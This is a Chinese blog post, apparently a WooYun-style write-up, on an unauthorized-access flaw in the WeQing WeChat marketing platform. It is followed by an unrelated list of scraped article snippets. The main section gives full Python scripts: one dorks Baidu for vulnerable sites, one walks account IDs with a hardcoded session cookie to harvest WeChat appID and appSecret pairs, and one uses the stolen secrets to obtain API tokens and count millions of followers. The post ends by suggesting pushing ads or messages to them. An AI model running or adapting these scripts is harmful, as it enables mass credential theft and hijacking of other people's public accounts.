qq458639026

微信黑科技

0x00 简介

开发微信第三方营销平台的人可谓是靠着微信官方开发文档发家的人，他们把开发文档变成产品，变成普通人一看就明白的东西，好多搞营销的不懂技术，好多做技术的不懂营销，他们可谓在技术和营销之前有效的搭了一座桥，让不懂技术的营销者可以通过第三方平台方便的接入微信。

微信本身是安全的，但是第三方平台的安全却没的保证，这篇文章就是想说明，在使用第三方平台便利性的同时埋下的安全隐患

0x01 从一个被忽略的漏洞说起

wooyun漏洞编号：wooyun-2016-0184202
<a href="http://drops.wooyun.org/%3Ca%20target=" _blank"="">WooYun: 微擎最新版可越权操作别人公众号 "> WooYun: 微擎最新版可越权操作别人公众号

很不解如此影响深远的漏洞，为什么会被忽略，是对客户的不负责任，还是对漏洞本身的不了解

接下来就从这个被忽略的漏洞，挖出其背后成千上万受影响的用户

0x02 挖掘过程

百度搜索使用微擎系统的链接
注册并登录受影响的系统
批量获取受影响的系统中的微信appID和appSecret
通过调用微信开发者接口获取相应appID的用户列表
向这些用户发送hello world

百度搜索使用微擎系统的链接

 
         #!/usr/bin/env python 
        
         #coding:utf-8 
        
         import 
          requests 
        
         import 
          re 
        
         from 
          lxml  
         import 
          etree 
        
         import 
          sys 
        
         reload 
         (sys) 
        
         sys.setdefaultencoding( 
         'utf-8' 
         ) 
        
         def 
          getSearch(url): 
        
         headers  
         = 
         { 
         "User-Agent" 
         :  
         "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) " 
         } 
        
         content  
         = 
         getContent(url, headers) 
        
         selector  
         = 
         etree.HTML(content) 
        
         selectUrl  
         = 
         selector.xpath( 
         '//div[@class="f13"]/a[1]/@href' 
         ) 
        
         urls.extend(selectUrl) 
        
         def 
          getSearchUrl(urls): 
        
         for 
         url  
         in 
          urls: 
        
         headers  
         = 
         { 
         "User-Agent" 
         :  
         "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) " 
         } 
        
         header  
         = 
         "Location" 
        
         content  
         = 
         getRespHeader(url, headers, header) 
        
         selectUrl.append(content) 
        
         def 
          getContent(url, headers): 
        
         resp  
         = 
         requests.get(url, headers 
         = 
         headers) 
        
         return 
         resp.text 
        
         def 
          getRespHeader(url, headers, header): 
        
         resp  
         = 
         requests.get(url, headers 
         = 
         headers, allow_redirects 
         = 
         False 
         ) 
        
         return 
         resp.headers.get(header) 
        
         if 
          __name__  
         = 
         = 
         '__main__' 
         : 
        
         urls  
         = 
         [] 
        
         selectUrl  
         = 
         [] 
        
         for 
         i  
         in 
          [ 
         0 
         ,  
         10 
         ,  
         20 
         ,  
         30 
         ,  
         40 
         ,  
         50 
         ,  
         60 
         ]: 
        
         url  
         = 
         "http://www.baidu.com/s?wd=inurl%%3Aweb%%2Findex.php%%3Fc%%3Duser%%26a%%3Dlogin%%26&pn=%d&ie=utf-8" 
         % 
         i 
        
         getSearch(url) 
        
         getSearchUrl(urls) 
        
         print 
         selectUrl

结果搜到63条链接：

注册并登录受影响的系统

本来打算写个脚本批量注册然后出appid和key的，但由于有验证码，又因为本地验证码程序没有跑起来，而且也就60多个网站，于是乎就手工了一下，然后把拿appid和appSecret的过程写了个脚本

批量获取受影响的系统中的微信appID和appSecret

 
         #!/usr/bin/env python 
        
         #coding:utf-8 
        
         import 
          requests 
        
         from 
          lxml  
         import 
          etree 
        
         import 
          sys 
        
         reload 
         (sys) 
        
         sys.setdefaultencoding( 
         'utf-8' 
         ) 
        
         header  
         = 
         { 
         "cookie" 
         : 
         "7ba5___session=eyJ1aWQiOiIxMTE1IiwibGFzdHZpc2l0IjoiMTQ1ODQ3NTc1MyIsImxhc3RpcCI6IjIxOC4xMDguMTI4LjEwMSIsImhhc2giOiI4YzcyMjFjOTE4Y2U2NjY1ZTdiMTQxYWJlYmRlZTcxOSJ9" 
         , 
         "User-Agent" 
         : 
         "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) " 
         } 
        
         def 
          getcontent(url,header): 
        
         resp  
         = 
         requests.get(url, headers 
         = 
         header) 
        
         return 
         resp.text 
        
         def 
          getkey(html): 
        
         global 
         count 
        
         rest  
         = 
         [] 
        
         selector  
         = 
         etree.HTML(html) 
        
         weixinAppId  
         = 
         selector.xpath( 
         '//input[@name="key"]/@value' 
         ) 
        
         weixinAppSecret  
         = 
         selector.xpath( 
         '//input[@name="secret"]/@value' 
         ) 
        
         weixinAppName  
         = 
         selector.xpath( 
         '//input[@name="subname"]/@value' 
         ) 
        
         if 
         weixinAppId[ 
         0 
         ] ! 
         = 
         ' 
         ' and weixinAppSecret[0] != ' 
         ' and weixinAppId[0].find(' 
         wx')  
         = 
         = 
         0 
         : 
        
         print 
         weixinAppName[ 
         0 
         ] 
        
         rest.append(weixinAppName[ 
         0 
         ]) 
        
         rest.append(weixinAppId[ 
         0 
         ]) 
        
         rest.append(weixinAppSecret[ 
         0 
         ]) 
        
         str_rest  
         = 
         str 
         (rest).replace( 
         'u\'' 
         , 
         '\'' 
         ) 
        
         str_rest  
         = 
         str_rest.decode( 
         "unicode-escape" 
         ) 
        
         with  
         open 
         ( 
         'result.txt' 
         ,  
         'a' 
         ) as fs: 
        
         fs.write(str_rest  
         + 
         '\n' 
         ) 
        
         if 
          __name__  
         = 
         = 
         '__main__' 
         : 
        
         for 
         i  
         in 
          range 
         ( 
         1 
         ,  
         1056 
         ): 
        
         url  
         = 
         "http://wx.xxx.cn/web/index.php?c=account&a=post&uniacid=84&acid=%d" 
         % 
         i 
        
         print 
         url 
        
         html  
         = 
         getcontent(url, header) 
        
         getkey(html)

待每个链接都尝试之后，一共捕获到700多个微信appid和secret

通过调用微信开发者接口获取相应appID的用户列表

这里通过脚本获取一下这么多微信appid一共涉及多少用户

 
         # coding:utf-8 
        
         import 
          requests 
        
         import 
          ast 
        
         count  
         = 
         0 
        
         def 
          getCount(url): 
        
         global 
         count 
        
         headers  
         = 
         { 
         "User-Agent" 
         :  
         "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) " 
         } 
        
         resp  
         = 
         requests.get(url, headers 
         = 
         headers) 
        
         con  
         = 
         ast.literal_eval(resp.text) 
        
         if 
         type 
         (con)  
         = 
         = 
          dict 
         and 
         "total" 
         in 
         con: 
        
         count  
         + 
         = 
         int 
         (con[ 
         "total" 
         ]) 
        
         def 
          getAccesstoken(content): 
        
         con  
         = 
         ast.literal_eval(content) 
        
         if 
         type 
         (con)  
         = 
         = 
          dict 
         and 
         "access_token" 
         in 
         con: 
        
         url  
         = 
         "https://api.weixin.qq.com/cgi-bin/user/get?access_token=%s" 
         % 
         con[ 
         "access_token" 
         ] 
        
         getCount(url) 
        
         def 
          getContent(line): 
        
         headers  
         = 
         { 
         "User-Agent" 
         :  
         "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) " 
         } 
        
         wxappid  
         = 
         line[ 
         1 
         ] 
        
         wxsecret  
         = 
         line[ 
         2 
         ] 
        
         url  
         = 
         "https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=%s&secret=%s" 
         % 
         (wxappid, wxsecret) 
        
         resp  
         = 
         requests.get(url, headers 
         = 
         headers) 
        
         getAccesstoken(resp.text) 
        
         if 
          __name__  
         = 
         = 
         '__main__' 
         : 
        
         with  
         open 
         ( 
         'result.txt' 
         ,  
         'r' 
         ) as fs: 
        
         for 
         line  
         in 
          fs.readlines(): 
        
         line  
         = 
         line.replace( 
         '\r' 
         , ' 
         ').replace(' 
         \n 
         ', ' 
         ') 
        
         getContent( 
         eval 
         (line)) 
        
         print 
         count

跑完脚本发现一共涉及到577万用户

0x03 结尾

这570多万用户重复率很低，可以向这570万用户推送广告，可以向这570万用户发送消息，可以向这500万用户发送一句"你我如此近距离，你却不知道我是谁"。

你可能感兴趣的:(微信黑科技)

因为送礼电商！2025微信、抖音、淘宝又撕破了脸 liukuang110 微信
因为一个“送礼功能”，微信小店火了。网上盛传“今年过年不收礼，收礼只收小蓝包”就像当年微信红包功能横空出世引发全民追捧，一战成名一样，微信“小蓝包”再次掀起了全民热潮。其实，“送礼功能”早已不是新鲜事物，淘宝、抖音、美团等电商平台都曾推出过类似功能，但没引起过多关注。然而，面对价格战、服务战的疲惫，电商平台急需新的吸引点来刺激消费者，即便是新瓶装旧酒，电商平台和消费者也乐于跟风尝试，使得送礼电商迅
python爬取公众号历史文章_微信公众号爬虫--历史文章冷风吹心冷风吹心 python爬取公众号历史文章
今天搞了一个微信公众号历史文章爬虫的demo，亲测可行，记录一下！(不喜勿喷)缺点：1.不是很智能2.兼容性不是很好，但是能应付正常情况啦使用mysql+request数据库部分直接建表ddl吧：CREATETABLE`wechat_content`(`id`int(11)NOTNULLAUTO_INCREMENT,`wechat_name`varchar(255)DEFAULTNULLCOMME
微信小程序开发工具介绍及安装（上）计算机萍萍学姐小程序开发微信小程序小程序微信
本章主要介绍微信小程序开发工具的介绍小程序开发工具的安装方法开发工具的基本功能介绍微信小程序开发工具的介绍微信小程序开发工具是一款由微信官方提供的集成开发环境（IDE），旨在帮助开发者更便捷地创建、调试和发布微信小程序。该开发工具具备丰富的功能和工具集，可以极大地提高小程序开发的效率和质量。以下是对微信小程序开发工具的介绍：一、简介微信小程序开发工具是微信官方推出的一款跨平台开发工具，适用于开发者
微信小程序使用上拉加载onReachBottom。页面拖不动。一直无法触发上拉的事件。肖肖肖丽珠微信小程序小程序
1，可能是原因是你使用了scroll-view的标签，用onReachBottom触发加载事件。这两个是有冲突的。没办法一起使用。如果页面的样式是滚动的是无法去触发页面的onReachBottom的函数的。因此，你使用overflow:auto.来使用页面的某些元素滚动，照样也无法触发onReachBottom。2，滚动区域有部分内容被遮挡怎么解决起初我以为我给滚动区域设置一个高度。height:
微信小程序开发项目-基于微信小程序的毕业设计180套(源码+演示录像+LW) 职场程序猿微信小程序毕业设计微信小程序课程设计小程序 java 毕设毕业设计
大家好！我是职场程序猿，感谢您阅读本文，欢迎一键三连哦。今天给大家分享180+的微信小程序毕业设计，后台用Java开发，这些项目都经过精心挑选，涵盖了不同的实战主题和用例，可做毕业设计和课程设计参考。✍️除了源码，对于大部分项目实现的功能都有相应的介绍，并且配有演示视频，方便大家根据自己的需要择优下载学习。另外如有定制需求或者想要相对应的论文参考，文末可以十我VX联系。后续还会持续更新，欢迎关注！
微信小程序技术架构图流着口水看上帝微信小程序小程序
一、视图层1.WXML（WeiXinMarkupLanguage）这是微信小程序的标记语言，类似于HTML。它用于构建小程序的页面结构。例如，通过标签来定义各种视图元素，如（类似于HTML中的）用于布局，用于显示文本等。它具有数据绑定功能，通过双大括号{{}}语法可以将数据动态地显示在页面元素中。比如，定义一个变量name，在WXML中可以通过{{name}}来显示变量name的值。2.WXSS（
CameraX 下使用 OpenCV 微信二维码识别 AndroidKt Android OpenCV android opencv kotlin 计算机视觉图像处理
前言前面，我们已经介绍了两种集成wechat_qrcode微信二维码识别能力的做法：完整编译OpenCV和OpenCVContribNativeC++单独集成wechat_qrcode模块这两种方式的预览和识别均是基于OpenCV提供的JavaCamera2View。今天介绍一下如何通过CameraX框架调用wechat_qrcode模块能力。CameraX基本使用CameraX具有以下最低版本要
鸿蒙版微信正式上架，国产化软件抱团进化多样化生态圈 zzlyx99 harmonyos 华为
微信鸿蒙版已经在2024年10月12日正式上架鸿蒙应用市场，并且开始公测。根据报道，上架后鸿蒙版微信的公测名额在很短的时间内就被抢光，显示出用户对于这款应用的极大热情。腾讯高管张军宣布，自10月12日起，每晚在鸿蒙应用市场的“尝鲜专区”发放鸿蒙版微信的测试名额，以保障更多用户的使用需求。一、华为手机鸿蒙系统如何更新微信鸿蒙版要更新华为手机上的鸿蒙系统至微信鸿蒙版，您可以按照以下步骤操作：确保您的设
2025届-2026届计算机专业毕业设计选题指南推荐—解答选题困惑以及三大选题方向 IT跃迁谷毕设展 Python实战项目专栏 Java实战项目专栏大数据实战项目专栏计算机毕业设计课程设计毕设毕业设计 java python 大数据
作者：IT跃迁谷毕设展个人简介：曾长期从事计算机专业培训教学，本人也热爱上课教学，语言擅长Java、微信小程序、Python、Golang、安卓Android等。平常会做一些项目定制化开发、代码讲解、答辩教学、文档编写、也懂一些降重方面的技巧。平常喜欢分享一些自己开发中遇到的问题的解决办法，也喜欢交流技术，大家有技术代码这一块的问题可以问我！想说的话：感谢大家的关注与支持！Java实战项目集微信小
腾讯云主机多账户切换与管理和使用vscode终端ssh登录
当前是2024版本腾讯云主机，在获取到主机实例之后应该有两个用户：lighthouse（这是具有root权限的）和ubuntu（后面叫什么这个应该取决于你的系统版本）由于在linux中不同用户往往有不同权限，所以用户密码修改还是重要的1.如何修改对应账户的登录密码在腾讯云控制台找到主机，点进去控制界面会显示下图免密登录：会帮你在浏览器打开一个在线SSH终端界面，你可以通过微信扫码授权登录（略过不谈
YOLOv11目标检测模型部署到微信小程序上小阿技术 YOLO 目标跟踪人工智能微信小程序目标检测计算机视觉 python
1.效果YOLOv11目标检测模型部署到微信小程序上2.后端主要代码importosimporttimeimportnumpyasnpimporttorchfromflaskimportFlask,request,send_fileimportcv2fromultralyticsimportYOLO#导入YOLOv11模型，需要提前安装ultralytics库#初始化Flask应用app=Flas
java ssm基于微信小程序的小说图书阅读系统网上书城论坛交流（源码+文档+运行视频+讲解视频） QQ2279239102 SSM 微信小程序 java 微信小程序开发语言 SSM vue.js
文章目录系列文章目录目的前言一、详细视频演示二、项目部分实现截图三、技术栈后端框架SSM前端框架vueSSM框架详细介绍系统测试微信小程序介绍四、代码参考源码获取目的摘要：基于JavaSsm与微信小程序的小说图书阅读系统，为书虫打造沉浸式阅读天地，兼设论坛交流，丰富阅读体验，促进文学交流。网上书城汇聚海量小说、图书，分类精细，搜索便捷，用户通过微信小程序阅读，支持字体、背景调节，书签、笔记功能方便
苍穹外卖07——来单提醒和客户催单（涉及SpringTask、WebSocket协议、苍穹外卖跳过微信支付同时保证可以收到订单功能） 6JSh5Z2k5Y+35ouJ 苍穹外卖前端 linux 数据库
SpringTask介绍应用场景：信用卡每月还款提醒银行贷款每月还款提醒火车票销售系统处理未付款订单入职纪念日为用户发送通知cron表达式cron表达式其实就是一个字符串，通过cron表达式可以定义任务触发的时间。构成规则：分为6或7个域，由空格分隔，每个域代表一个含义。每个域的含义分别为：秒、分钟、小时、日、月、周、年（可选）。秒分钟小时日月周年2022年10月12日上午9点整对应的cron表达
微信小程序交易平台/基于微信小程序的购物系统/基于微信小程序的电商平台/基于微信小程序的商品销售系统一枚小小程序员哈微信小程序小程序
摘要随着当今网络的发展，时代的进步，各行各业也在发生着变化，于是网络已经逐步进入人们的生活，给我们生活或者工作提供了新的方向新的可能。本毕业设计的内容是设计实现一个微信小程序交易平台。使用微信开发者是以java语言进行开发，MYSQL为数据库开发平台，Tomcat网络信息服务作为应用服务器。微信小程序交易平台的功能已基本实现，主要包括有商家、用户、商品分类、商品信息、商品咨询等功能。本微信小程序软
泷羽sec学习--Shell编程之用户交互索然无味io 网络安全学习网络安全 linux bash
学习内容来自B站UP：泷羽sec微信公众号：泷羽sec1.使用read命令实现交互基本语法：read命令用于从标准输入（通常是键盘）读取用户输入的数据。其基本格式为read[选项]变量名。例如，readname会暂停脚本的执行，等待用户输入一个字符串，并将这个字符串赋值给变量name。选项说明：-p选项：用于在等待用户输入时显示提示信息。例如，read-p"请输入你的名字："name，这样在等待用
MySQL-事务隔离级别与MVCC 事务快照视图mysqlmvcc
大家好，我是半夏之沫一名金融科技领域的JAVA系统研发我希望将自己工作和学习中的经验以最朴实，最严谨的方式分享给大家，共同进步写作不易，期待大家的关注和点赞关注微信公众号【技术探界】前言本篇文章首先会对数据库事务的几个基础概念进行说明，主要是事务ACID模型，并发事务带来的问题和事务隔离级别。然后在此基础上，会对MySQL的InnoDB引擎中的一致性非锁定读取（ConsistentNonlocki
基于微信小程序的个人健康管理系统计算机学姐微信小程序源码微信小程序小程序 spring boot java vue.js intellij-idea mybatis
作者：计算机学姐开发技术：SpringBoot、SSM、Vue、MySQL、JSP、ElementUI、Python、小程序等，“文末源码”。专栏推荐：前后端分离项目源码、SpringBoot项目源码、Vue项目源码、SSM项目源码、微信小程序源码精品专栏：Java精选实战项目源码、Python精选实战项目源码、大数据精选实战项目源码系统展示基于微信小程序+Java+SpringBoot+Vue+
微信小程序实现个人中心页面浩宇软件开发微信小程序开发入门微信小程序小程序
文章目录1.官方文档教程2.编写静态页面3.关于作者其它项目视频教程介绍1.官方文档教程https://developers.weixin.qq.com/miniprogram/dev/framework/2.编写静态页面mine.wxml布局文件wangwu这个家伙很懒，什么都没有留下~官方客服积分兑换帮助中心系统设置修改密码关于APP清理缓存用户条款隐私协议退出登录navigation-bar
微信小程序校园自助点餐系统实战：从设计到实现大梦百万秋知识学爆 notepad++
随着移动互联网的发展，越来越多的校园场景开始智能化、自助化。微信小程序凭借其轻量化、便捷性和强大的生态支持，成为了各类校园应用的首选工具之一。今天，我们将通过实际开发一个微信小程序“校园自助点餐系统”来展示如何设计和实现这样一个系统。1.项目简介校园自助点餐系统是一个微信小程序，用户可以通过手机自助查看校园食堂的菜单、选择菜品并下单，随后可选择取餐方式。整个流程无须排队，极大地提高了点餐的效率，也
掌控 React 表单：详解受控组件和非受控组件
大家好，我是长林啊！一个爱好JavaScript、Go、Rust的全栈开发者；致力于终生学习和技术分享。本文首发在我的微信公众号【长林啊】，欢迎大家关注、分享、点赞！在开发过程中，经常涉及到用户输入的表单处理；表单可以分为两种类型：受控表单（ControlledComponents）和非受控表单（UncontrolledComponents）。这两种表单在处理用户输入和状态管理时有着不同的方式。例
交友系统app源码优势?支持微信小程序/相亲交友小程序前端后端软件开发平台工程源码
交友系统APP源码的优势主要体现在以下几个方面，这些优势对于开发者、运营者以及最终用户来说都至关重要：一、可扩展性与灵活性可扩展性：交友系统源码通常提供了基本的功能模块，如用户注册、登录、个人信息管理、搜索匹配、聊天室等。开发者可以根据实际需求，轻松地扩展和定制新的功能，如漂流瓶、约会推荐算法等，以满足不同用户群体的需求。灵活性：源代码通常遵循模块化设计，使得不同部分可以独立开发和测试。这种设计不
前端校园圈子交友源码打造跑腿为一体的平台前端后端app
搭建一个功能完善、运营顺畅的校园圈子跑腿和外卖一体化的平台。同时，平台还需要不断优化和改进，以满足用户不断变化的需求和期望。市场调研：了解校园内学生和教职工对跑腿和外卖服务的需求。分析竞争对手的服务内容、价格策略和用户反馈。确定平台的目标用户群体和服务范围。制定商业计划：明确平台的商业模式和盈利点。设定服务项目和收费标准。规划市场推广策略和合作伙伴关系。技术开发：选择适合的开发语言和框架，如微信小
uniapp微信小程序摇一摇抽奖功能的实现 neter.asia uni-app 微信小程序小程序
使用微信提供的wx.startAccelerometer(）方法实现，可以写在onShow()钩子函数中，当用户摇动手机时会自动触发具体实现方法如下：//开始监听加速度数据。wx.startAccelerometer({interval:'game',success:function(){//监听加速度数据事件。频率根据wx.startAccelerometer()的interval参数,接口调用
如何制作一个自己的社区招聘软件新微云小编辑小程序前端后端需求分析性能优化个人开发产品运营
本项目旨在开发一个本地化的社区招聘软件，通过小程序实现多端适配，确保苹果和安卓手机用户都能便捷使用。该软件将允许用户发布所在社区或工业园区的招聘就业信息，并支持多种行业分类，以便不同行业的岗位信息能够以适合的方式展示。1.用户注册与登录支持手机号码注册和第三方登录（如微信、QQ）。用户信息管理，包括个人资料编辑和密码修改。2.招聘信息发布用户可以发布招聘信息，包括职位名称、公司简介、工作地点、薪资
Zerox：AI驱动的万能OCR工具，精准识别复杂布局并输出Markdown格式，支持PDF、DOCX、图片等多种文件格式蚝油菜花每日 AI 项目与应用实例人工智能 ocr pdf 人工智能开源
❤️如果你也关注AI的发展现状，且对AI应用开发非常感兴趣，我会每日分享大模型与AI领域的最新开源项目和应用，提供运行实例和实用教程，帮助你快速上手AI技术，欢迎关注我哦！微信公众号｜搜一搜：蚝油菜花快速阅读功能：支持零样本OCR识别，兼容PDF、DOCX、图片等多种格式文件。技术：基于GPT-4o-mini模型，能够处理复杂布局文档，输出Markdown格式结果。应用：提供API接口，便于集成到
走进JavaWeb技术世界11：单元测试框架Junit 程序员黄小斜走进JavaWeb技术世界 Java
本系列文章将整理到我在GitHub上的《Java面试指南》仓库，更多精彩内容请到我的仓库里查看https://github.com/h2pl/Java-Tutorial喜欢的话麻烦点下Star哈文章首发于我的个人博客：www.how2playlife.com本文是微信公众号【Java技术江湖】的《走进JavaWeb技术世界》其中一篇，本文部分内容来源于网络，为了把本文主题讲得清晰透彻，也整合了很多
uniapp 开发 h5 授权微信登录（静默和非静默）陈龙龙的陈龙龙 uni-app uni-app 微信前端 html javascript
具体流程：进入h5➡️静默登录➡️请求登录接口➡️必要时候调起登录组件➡️点击按钮进行非静默登录➡️再次请求登录接口➡️获取到所有用户数据一、封装登录functionauthLogin:(callback)=>{constthat=this;//判断是否是在微信环境下运行if(utils.isWechat()){consttoken=window.localStorage.getItem('__t
uniapp vite+vue3+ts微信小程序项目组合式Api自动导入懒人的烦恼 uniapp微信小程序 uni-app vue 前端框架微信小程序
相信很多新手(博主也是菜鸡,不喜勿喷!),在公司都喜欢自己创建新的项目,搭建自己项目框架。都会遇到vue3组合式Api导入的问题而感到烦恼！这里教大家怎么简单的配置1.安装需要的插件unplugin-auto-import在项目根目录运行：如下代码npminstall-Dunplugin-auto-import2.安装成功后，修改项目的tsconfig.json文件主要时在inclue里面末尾添加
微信小程序的登录流程-登录与静默登录 Allen_vv 微信小程序小程序微信
1.首先通过uni.getProvider获取到服务的供应商，调用API接口时需要指定service的参数为'weixin'，在success的回调函数中对登录的流程做处理。2.通过调用uni.login获取到所需要的参数code，再通过uni.getUserProfile获取微信用户的基本信息，这个API需要指定一个参数为desc：这个参数是需要通知给微信服务器的，在success的回调函数中获
微信小程序通用静默获取openid和Session_key TurboMT 小程序 php 小程序 php openid
小程序公共app.js代码//app.jsconstserver=require('./server/server.js');App({onLaunch:function(){//展示本地存储能力varlogs=wx.getStorageSync('logs')||[]logs.unshift(Date.now())wx.setStorageSync('logs',logs)//登录wx.chec
算法单链的创建与删除换个号韩国红果果 c 算法
先创建结构体 struct student { int data; //int tag;//标记这是第几个 struct student *next; }; // addone 用于将一个数插入已从小到大排好序的链中 struct student *addone(struct student *h,int x){ if(h==NULL) //??????
《大型网站系统与Java中间件实践》第2章读后感白糖_ java中间件
断断续续花了两天时间试读了《大型网站系统与Java中间件实践》的第2章，这章总述了从一个小型单机构建的网站发展到大型网站的演化过程---整个过程会遇到很多困难，但每一个屏障都会有解决方案，最终就是依靠这些个解决方案汇聚到一起组成了一个健壮稳定高效的大型系统。看完整章内容，
zeus持久层spring事务单元测试 deng520159 java DAO spring jdbc
今天把zeus事务单元测试放出来,让大家指出他的毛病, 1.ZeusTransactionTest.java 单元测试 package com.dengliang.zeus.webdemo.test; import java.util.ArrayList; import java.util.List; import org.junit.Test; import
Rss 订阅开发周凡杨 html xml 订阅 rss 规范
RSS是 Really Simple Syndication的缩写（对rss2.0而言，是这三个词的缩写，对rss1.0而言则是RDF Site Summary的缩写，1.0与2.0走的是两个体系）。 RSS
分页查询实现 g21121 分页查询
在查询列表时我们常常会用到分页，分页的好处就是减少数据交换，每次查询一定数量减少数据库压力等等。按实现形式分前台分页和服务器分页：前台分页就是一次查询出所有记录，在页面中用js进行虚拟分页，这种形式在数据量较小时优势比较明显，一次加载就不必再访问服务器了，但当数据量较大时会对页面造成压力，传输速度也会大幅下降。服务器分页就是每次请求相同数量记录，按一定规则排序，每次取一定序号直接的数据
spring jms异步消息处理 510888780 jms
spring JMS对于异步消息处理基本上只需配置下就能进行高效的处理。其核心就是消息侦听器容器，常用的类就是DefaultMessageListenerContainer。该容器可配置侦听器的并发数量，以及配合MessageListenerAdapter使用消息驱动POJO进行消息处理。且消息驱动POJO是放入TaskExecutor中进行处理，进一步提高性能，减少侦听器的阻塞。具体配置如下：
highCharts柱状图布衣凌宇 hightCharts 柱图
第一步：导入 exporting.js,grid.js,highcharts.js;第二步：写controller @Controller@RequestMapping(value="${adminPath}/statistick")public class StatistickController { private UserServi
我的spring学习笔记2-IoC（反向控制依赖注入） aijuans spring mvc Spring 教程 spring3 教程 Spring 入门
IoC（反向控制依赖注入）这是Spring提出来了，这也是Spring一大特色。这里我不用多说，我们看Spring教程就可以了解。当然我们不用Spring也可以用IoC，下面我将介绍不用Spring的IoC。 IoC不是框架，她是java的技术，如今大多数轻量级的容器都会用到IoC技术。这里我就用一个例子来说明：如：程序中有 Mysql.calss 、Oracle.class 、SqlSe
TLS java简单实现 antlove java ssl keystore tls secure
1. SSLServer.java package ssl; import java.io.FileInputStream; import java.io.InputStream; import java.net.ServerSocket; import java.net.Socket; import java.security.KeyStore; import
Zip解压压缩文件百合不是茶 Zip格式解压 Zip流的使用文件解压
ZIP文件的解压缩实质上就是从输入流中读取数据。Java.util.zip包提供了类ZipInputStream来读取ZIP文件,下面的代码段创建了一个输入流来读取ZIP格式的文件; ZipInputStream in = new ZipInputStream(new FileInputStream(zipFileName)); &n
underscore.js 学习（一） bijian1013 JavaScript underscore
工作中需要用到underscore.js，发现这是一个包括了很多基本功能函数的js库，里面有很多实用的函数。而且它没有扩展 javascript的原生对象。主要涉及对Collection、Object、Array、Function的操作。学
java jvm常用命令工具——jstatd命令(Java Statistics Monitoring Daemon) bijian1013 java jvm jstatd
1.介绍 jstatd是一个基于RMI（Remove Method Invocation）的服务程序，它用于监控基于HotSpot的JVM中资源的创建及销毁，并且提供了一个远程接口允许远程的监控工具连接到本地的JVM执行命令。 jstatd是基于RMI的，所以在运行jstatd的服务
【Spring框架三】Spring常用注解之Transactional bit1129 transactional
Spring可以通过注解@Transactional来为业务逻辑层的方法(调用DAO完成持久化动作)添加事务能力，如下是@Transactional注解的定义： /* * Copyright 2002-2010 the original author or authors. * * Licensed under the Apache License, Version
我(程序员)的前进方向 bitray 程序员
作为一个普通的程序员,我一直游走在java语言中,java也确实让我有了很多的体会.不过随着学习的深入,java语言的新技术产生的越来越多,从最初期的javase,我逐渐开始转变到ssh,ssi,这种主流的码农,.过了几天为了解决新问题,webservice的大旗也被我祭出来了,又过了些日子jms架构的activemq也开始必须学习了.再后来开始了一系列技术学习,osgi,restful.....
nginx lua开发经验总结 ronin47
使用nginx lua已经两三个月了，项目接开发完毕了，这几天准备上线并且跟高德地图对接。回顾下来lua在项目中占得必中还是比较大的，跟PHP的占比差不多持平了，因此在开发中遇到一些问题备忘一下 1：content_by_lua中代码容量有限制，一般不要写太多代码，正常编写代码一般在100行左右（具体容量没有细心测哈哈，在4kb左右），如果超出了则重启nginx的时候会报 too long pa
java-66-用递归颠倒一个栈。例如输入栈{1,2,3,4,5}，1在栈顶。颠倒之后的栈为{5,4,3,2,1}，5处在栈顶 bylijinnan java
import java.util.Stack; public class ReverseStackRecursive { /** * Q 66.颠倒栈。 * 题目：用递归颠倒一个栈。例如输入栈{1,2,3,4,5}，1在栈顶。 * 颠倒之后的栈为{5,4,3,2,1}，5处在栈顶。 *1. Pop the top element *2. Revers
正确理解Linux内存占用过高的问题 cfyme linux
Linux开机后，使用top命令查看，4G物理内存发现已使用的多大3.2G，占用率高达80%以上： Mem: 3889836k total, 3341868k used, 547968k free, 286044k buffers Swap: 6127608k total,&nb
[JWFD开源工作流]当前流程引擎设计的一个急需解决的问题 comsci 工作流
当我们的流程引擎进入IRC阶段的时候，当循环反馈模型出现之后，每次循环都会导致一大堆节点内存数据残留在系统内存中，循环的次数越多，这些残留数据将导致系统内存溢出，并使得引擎崩溃。。。。。。而解决办法就是利用汇编语言或者其它系统编程语言，在引擎运行时，把这些残留数据清除掉。
自定义类的equals函数 dai_lm equals
仅作笔记使用 public class VectorQueue { private final Vector<VectorItem> queue; private class VectorItem { private final Object item; private final int quantity; public VectorI
Linux下安装R语言 datageek R语言 linux
命令如下：sudo gedit /etc/apt/sources.list1、deb http://mirrors.ustc.edu.cn/CRAN/bin/linux/ubuntu/ precise/ 2、deb http://dk.archive.ubuntu.com/ubuntu hardy universesudo apt-key adv --keyserver ke
如何修改mysql 并发数(连接数)最大值 dcj3sjt126com mysql
MySQL的连接数最大值跟MySQL没关系，主要看系统和业务逻辑了方法一：进入MYSQL安装目录打开MYSQL配置文件 my.ini 或 my.cnf查找 max_connections=100 修改为 max_connections=1000 服务里重起MYSQL即可　　方法二：MySQL的最大连接数默认是100客户端登录：mysql -uusername -ppass
单一功能原则 dcj3sjt126com 面向对象的程序设计软件设计编程原则
单一功能原则[ 编辑] SOLID 原则单一功能原则开闭原则 Liskov代换原则接口隔离原则依赖反转原则查论编在面向对象编程领域中，单一功能原则（Single responsibility principle）规定每个类都应该有
POJO、VO和JavaBean区别和联系 fanmingxing VO POJO javabean
POJO和JavaBean是我们常见的两个关键字，一般容易混淆，POJO全称是Plain Ordinary Java Object / Plain Old Java Object，中文可以翻译成：普通Java类，具有一部分getter/setter方法的那种类就可以称作POJO，但是JavaBean则比POJO复杂很多，JavaBean是一种组件技术，就好像你做了一个扳子，而这个扳子会在很多地方被
SpringSecurity3.X--LDAP：AD配置 hanqunfeng SpringSecurity
前面介绍过基于本地数据库验证的方式，参考http://hanqunfeng.iteye.com/blog/1155226，这里说一下如何修改为使用AD进行身份验证【只对用户名和密码进行验证，权限依旧存储在本地数据库中】。将配置文件中的如下部分删除：
mac mysql 修改密码 IXHONG mysql
$ sudo /usr/local/mysql/bin/mysqld_safe –user=root & //启动MySQL(也可以通过偏好设置面板来启动)$ sudo /usr/local/mysql/bin/mysqladmin -uroot password yourpassword //设置MySQL密码（注意，这是第一次MySQL密码为空的时候的设置命令，如果是修改密码，还需在-
设计模式--抽象工厂模式 kerryg 设计模式
